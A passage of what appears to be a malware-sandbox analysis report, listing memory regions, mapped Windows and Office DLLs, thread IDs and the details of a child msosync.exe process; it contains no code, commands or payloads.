filename = "" Region: id = 946 start_va = 0x7ffb33c40000 end_va = 0x7ffb33d12fff monitored = 0 entry_point = 0x7ffb33c41350 region_type = mapped_file name = "acees.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\acees.dll") Region: id = 947 start_va = 0x7ffb4ea90000 end_va = 0x7ffb4ea97fff monitored = 0 entry_point = 0x7ffb4ea91a98 region_type = mapped_file name = "vbajet32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\vbajet32.dll") Region: id = 948 start_va = 0x52410000 end_va = 0x524e1fff monitored = 0 entry_point = 0x524314e4 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 949 start_va = 0x141c73e0000 end_va = 0x141c74effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c73e0000" filename = "" Region: id = 950 start_va = 0x7ffb3afb0000 end_va = 0x7ffb3b029fff monitored = 0 entry_point = 0x7ffb3aff2590 region_type = mapped_file name = "expsrv.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\expsrv.dll") Region: id = 951 start_va = 0x141c73e0000 end_va = 0x141c73eafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 952 start_va = 0x141c74e0000 end_va = 0x141c74effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c74e0000" filename = "" Region: id = 953 start_va = 0x141c73f0000 end_va = 0x141c73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c73f0000" filename = "" Region: id = 954 start_va = 0x141c74f0000 end_va = 0x141c77effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c74f0000" filename = "" Region: id = 955 start_va = 0x141c7400000 end_va = 0x141c740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7400000" filename = "" Region: id = 956 start_va = 0x141c87f0000 end_va = 0x141c8aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c87f0000" filename = "" Region: id = 957 start_va = 0x141c73f0000 end_va = 0x141c73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c73f0000" filename = "" Region: id = 958 start_va = 0x141c7400000 end_va = 0x141c740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7400000" filename = "" Region: id = 959 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 960 start_va = 0x141c9ff0000 end_va = 0x141ca2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c9ff0000" filename = "" Region: id = 961 start_va = 0x141c7410000 end_va = 0x141c741ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7410000" filename = "" Region: id = 962 start_va = 0x141cbef0000 end_va = 0x141cc1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141cbef0000" filename = "" Region: id = 963 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 964 start_va = 0x141c7410000 end_va = 0x141c741ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7410000" filename = "" Region: id = 965 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 966 start_va = 0x141cc0f0000 end_va = 0x141cc3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141cc0f0000" filename = "" Region: id = 967 start_va = 0x141c73f0000 end_va = 0x141c73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c73f0000" filename = "" Region: id = 968 start_va = 0x141cd9f0000 end_va = 0x141cdceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141cd9f0000" filename = "" Region: id = 969 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 970 start_va = 0x141c73f0000 end_va = 0x141c73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c73f0000" filename = "" Region: id = 971 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 972 start_va = 0x141cf9f0000 end_va = 0x141cfceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141cf9f0000" filename = "" Region: id = 973 start_va = 0x141c7400000 end_va = 0x141c740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7400000" filename = "" Region: id = 974 start_va = 0x141cfdf0000 end_va = 0x141d00effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141cfdf0000" filename = "" Region: id = 975 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 976 start_va = 0x141c7400000 end_va = 0x141c740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7400000" filename = "" Region: id = 977 start_va = 0x2264400000 end_va = 0x22644fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264400000" filename = "" Region: id = 978 start_va = 0x7ffb40030000 end_va = 0x7ffb40080fff monitored = 0 entry_point = 0x7ffb40031cfc region_type = mapped_file name = "csiresources.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\CSIRESOURCES.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\csiresources.dll") Region: id = 979 start_va = 0x2264500000 end_va = 0x22645fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264500000" filename = "" Region: id = 980 start_va = 0x141c74f0000 end_va = 0x141c75ccfff monitored = 0 entry_point = 0x141c754e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 981 start_va = 0x141c74f0000 end_va = 0x141c76a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 982 start_va = 0x141c76b0000 end_va = 0x141c78affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c76b0000" filename = "" Region: id = 983 start_va = 0x2264600000 end_va = 0x22646fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264600000" filename = "" Region: id = 984 start_va = 0x2264700000 end_va = 0x22647fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264700000" filename = "" Region: id = 985 start_va = 0x2264800000 end_va = 0x22648fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264800000" filename = "" Region: id = 986 start_va = 0x2264900000 end_va = 0x22649fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264900000" filename = "" Region: id = 987 start_va = 0x2264a00000 end_va = 0x2264afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264a00000" filename = "" Region: id = 988 start_va = 0x2264b00000 end_va = 0x2264bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264b00000" filename = "" Region: id = 989 start_va = 0x7ffb54a70000 end_va = 0x7ffb54adafff monitored = 0 entry_point = 0x7ffb54a890c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 990 start_va = 0x7ffb4b960000 end_va = 0x7ffb4b96dfff monitored = 0 entry_point = 0x7ffb4b961460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 991 start_va = 0x7ffb56de0000 end_va = 0x7ffb56de6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 992 start_va = 0x7ffb4f040000 end_va = 0x7ffb4f107fff monitored = 0 entry_point = 0x7ffb4f0813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 993 start_va = 0x7ffb4cfd0000 end_va = 0x7ffb4d007fff monitored = 0 entry_point = 0x7ffb4cfe8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 994 start_va = 0x7ffb54670000 end_va = 0x7ffb54677fff monitored = 0 entry_point = 0x7ffb54671ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 996 start_va = 0x7ffb4cf70000 end_va = 0x7ffb4cf85fff monitored = 0 entry_point = 0x7ffb4cf719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 997 start_va = 0x7ffb4cf50000 end_va = 0x7ffb4cf69fff monitored = 0 entry_point = 0x7ffb4cf52430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 999 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 1000 start_va = 0x141d04f0000 end_va = 0x141d07effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141d04f0000" filename = "" Region: id = 1001 start_va = 0x141c7420000 end_va = 0x141c742ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7420000" filename = "" Region: id = 1002 start_va = 0x141d25f0000 end_va = 0x141d28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141d25f0000" filename = "" Region: id = 1003 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" filename = "" Region: id = 1004 start_va = 0x141c7420000 end_va = 0x141c742ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7420000" filename = "" Region: id = 1005 start_va = 0x141c7430000 end_va = 0x141c743ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7430000" filename = "" Region: id = 1006 start_va = 0x141c7440000 end_va = 0x141c744ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7440000" filename = "" Region: id = 1007 start_va = 0x141d4ef0000 end_va = 0x141d51effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141d4ef0000" filename = "" Region: id = 1029 start_va = 0x7ffb4b940000 end_va = 0x7ffb4b954fff monitored = 0 entry_point = 0x7ffb4b942dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1030 start_va = 0x7ffb496a0000 end_va = 0x7ffb49857fff monitored = 0 entry_point = 0x7ffb4970e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1031 start_va = 0x7ffb4d300000 end_va = 0x7ffb4d681fff monitored = 0 entry_point = 0x7ffb4d351220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1047 start_va = 0x7ffb530f0000 end_va = 0x7ffb5311cfff monitored = 0 entry_point = 0x7ffb53109d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1048 start_va = 0x141c1c60000 end_va = 0x141c1c60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1c60000" filename = "" Region: id = 1049 start_va = 0x7ffb48b00000 end_va = 0x7ffb48d8dfff monitored = 0 entry_point = 0x7ffb48bd0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1050 start_va = 0x141c7400000 end_va = 0x141c7400fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1053 start_va = 0x7ffb52d40000 end_va = 0x7ffb52d9bfff monitored = 0 entry_point = 0x7ffb52d56f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1054 start_va = 0x7ffb51ee0000 end_va = 0x7ffb51f89fff monitored = 0 entry_point = 0x7ffb51f07910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1055 start_va = 0x7ffb46310000 end_va = 0x7ffb4638ffff monitored = 0 entry_point = 0x7ffb4633d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1056 start_va = 0x7ffb4c020000 end_va = 0x7ffb4c02afff monitored = 0 entry_point = 0x7ffb4c021d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1057 start_va = 0x141c7430000 end_va = 0x141c7434fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1058 start_va = 0x141c7440000 end_va = 0x141c744ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1059 start_va = 0x2264c00000 end_va = 0x2264cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264c00000" filename = "" Region: id = 1060 start_va = 0x7ffb4b410000 end_va = 0x7ffb4b419fff monitored = 0 entry_point = 0x7ffb4b4114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1061 start_va = 0x7ffb4be70000 end_va = 0x7ffb4bed6fff monitored = 0 entry_point = 0x7ffb4be763e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1062 start_va = 0x141c7450000 end_va = 0x141c7452fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1063 start_va = 0x141c7460000 end_va = 0x141c7469fff monitored = 0 entry_point = 0x141c74615c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1064 start_va = 0x141c7470000 end_va = 0x141c7470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1065 start_va = 0x141c7460000 end_va = 0x141c7469fff monitored = 0 entry_point = 0x141c74615c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1066 start_va = 0x141c7470000 end_va = 0x141c7470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1067 start_va = 0x141c7460000 end_va = 0x141c7469fff monitored = 0 entry_point = 0x141c74615c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1068 start_va = 0x141c7470000 end_va = 0x141c7470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1069 start_va = 0x141c7460000 end_va = 0x141c7469fff monitored = 0 entry_point = 0x141c74615c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1070 start_va = 0x141c7470000 end_va = 0x141c7470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1071 start_va = 0x7ffb529c0000 end_va = 0x7ffb52a39fff monitored = 0 entry_point = 0x7ffb529e1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1072 start_va = 0x7ffb534f0000 end_va = 0x7ffb534fffff monitored = 0 entry_point = 0x7ffb534f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1073 start_va = 0x7ffb53d60000 end_va = 0x7ffb53f26fff monitored = 0 entry_point = 0x7ffb53dbdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1074 start_va = 0x141c7460000 end_va = 0x141c7461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c7460000" filename = "" Region: id = 1075 start_va = 0x141c7470000 end_va = 0x141c7472fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7470000" filename = "" Region: id = 1076 start_va = 0x7ffb46160000 end_va = 0x7ffb46173fff monitored = 0 entry_point = 0x7ffb46163710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1077 start_va = 0x7ffb52fe0000 end_va = 0x7ffb53006fff monitored = 0 entry_point = 0x7ffb52ff0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1078 start_va = 0x7ffb52fa0000 end_va = 0x7ffb52fd9fff monitored = 0 entry_point = 0x7ffb52fa8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1079 start_va = 0x141c7480000 end_va = 0x141c7480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c7480000" filename = "" Region: id = 1082 start_va = 0x2264d00000 end_va = 0x2264dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264d00000" filename = "" Region: id = 1083 start_va = 0x7ffb46210000 end_va = 0x7ffb4622dfff monitored = 0 entry_point = 0x7ffb4621ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1084 start_va = 0x141c1c80000 end_va = 0x141c1c89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1085 start_va = 0x7ffb451e0000 end_va = 0x7ffb45341fff monitored = 0 entry_point = 0x7ffb45231b30 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 1087 start_va = 0x141c1c90000 end_va = 0x141c208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c90000" filename = "" Region: id = 1090 start_va = 0x7ffb493e0000 end_va = 0x7ffb493ebfff monitored = 0 entry_point = 0x7ffb493e35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1092 start_va = 0x141c74f0000 end_va = 0x141c75effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c74f0000" filename = "" Region: id = 1100 start_va = 0x141c2090000 end_va = 0x141c2092fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c2090000" filename = "" Region: id = 1101 start_va = 0x141c20a0000 end_va = 0x141c20a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c20a0000" filename = "" Region: id = 2672 start_va = 0x141c2090000 end_va = 0x141c2090fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c2090000" filename = "" Region: id = 2673 start_va = 0x141c20a0000 end_va = 0x141c20a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c20a0000" filename = "" Thread: id = 23 os_tid = 0x1398 Thread: id = 28 os_tid = 0x828 Thread: id = 31 os_tid = 0xe50 Thread: id = 32 os_tid = 0x370 Thread: id = 36 os_tid = 0x1150 Thread: id = 37 os_tid = 0x8a0 Thread: id = 38 os_tid = 0x1dc Thread: id = 39 os_tid = 0xa60 Thread: id = 41 os_tid = 0x115c Thread: id = 42 os_tid = 0x3f0 Thread: id = 43 os_tid = 0xbc4 Thread: id = 44 os_tid = 0x10c8 Thread: id = 45 os_tid = 0x9e8 Thread: id = 46 os_tid = 0xa2c Thread: id = 47 os_tid = 0x634 Thread: id = 48 os_tid = 0x1198 Thread: id = 49 os_tid = 0xad0 Thread: id = 50 os_tid = 0xb88 Thread: id = 51 os_tid = 0x13f0 Thread: id = 52 os_tid = 0x11a4 Thread: id = 53 os_tid = 0x474 Thread: id = 55 os_tid = 0xc84 Thread: id = 56 os_tid = 0x660 Process: id = "3" image_name = "msosync.exe" filename = "c:\\program files\\microsoft office\\office16\\msosync.exe" page_root = "0x2ee66000" os_pid = "0x13a0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1314" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\MsoSync.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Documents\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fc8c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 644 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 645 start_va = 0xd8cf800000 end_va = 0xd8cf9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8cf800000" filename = "" Region: id = 646 start_va = 0xd8cfa00000 end_va = 0xd8cfafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8cfa00000" filename = "" Region: id = 647 start_va = 0x24e11040000 end_va = 0x24e1105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11040000" filename = "" Region: id = 648 start_va = 0x24e11060000 end_va = 0x24e11074fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11060000" filename = "" Region: id = 649 start_va = 0x24e11080000 end_va = 0x24e11083fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11080000" filename = "" Region: id = 650 start_va = 0x24e11090000 end_va = 0x24e11091fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11090000" filename = "" Region: id = 651 start_va = 0x7ff6c5250000 end_va = 0x7ff6c5272fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c5250000" filename = "" Region: id = 652 start_va = 0x7ff6c5bd0000 end_va = 0x7ff6c5c48fff monitored = 0 entry_point = 0x7ff6c5bd968c region_type = mapped_file name = "msosync.exe" filename = "\\Program Files\\Microsoft Office\\Office16\\MSOSYNC.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\msosync.exe") Region: id = 653 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 673 start_va = 0x24e11040000 end_va = 0x24e1104ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11040000" filename = "" Region: id = 674 start_va = 0x24e110a0000 end_va = 0x24e1115dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 675 start_va = 0x24e11260000 end_va = 0x24e1135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11260000" filename = "" Region: id = 676 start_va = 0x7ff6c5150000 end_va = 0x7ff6c524ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c5150000" filename = "" Region: id = 677 start_va = 0x7ffb53b70000 end_va = 0x7ffb53d57fff monitored = 0 entry_point = 0x7ffb53b9ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 678 start_va = 0x7ffb55050000 end_va = 0x7ffb550fcfff monitored = 0 entry_point = 0x7ffb550681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 679 start_va = 0xd8cfb00000 end_va = 0xd8cfbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8cfb00000" filename = "" Region: id = 680 start_va = 0x24e11050000 end_va = 0x24e11056fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11050000" filename = "" Region: id = 681 start_va = 0x7ffb54fa0000 end_va = 0x7ffb55046fff monitored = 0 entry_point = 0x7ffb54fb58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 682 start_va = 0x7ffb54840000 end_va = 0x7ffb548dcfff monitored = 0 entry_point = 0x7ffb548478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 694 start_va = 0x7ffb46b70000 end_va = 0x7ffb46b88fff monitored = 0 entry_point = 0x7ffb46b7ee50 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 695 start_va = 0x7ffb52610000 end_va = 0x7ffb52703fff monitored = 0 entry_point = 0x7ffb5261a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 696 start_va = 0x7ffb55100000 end_va = 0x7ffb5515afff monitored = 0 entry_point = 0x7ffb551138b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 697 start_va = 0x7ffb55160000 end_va = 0x7ffb5527bfff monitored = 0 entry_point = 0x7ffb551a02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 698 start_va = 0x7ffb548e0000 end_va = 0x7ffb54a65fff monitored = 0 entry_point = 0x7ffb5492ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 699 start_va = 0x7ffb54680000 end_va = 0x7ffb547d5fff monitored = 0 entry_point = 0x7ffb5468a8d0 region_type = mapped_file name = "user32.dll" filename = 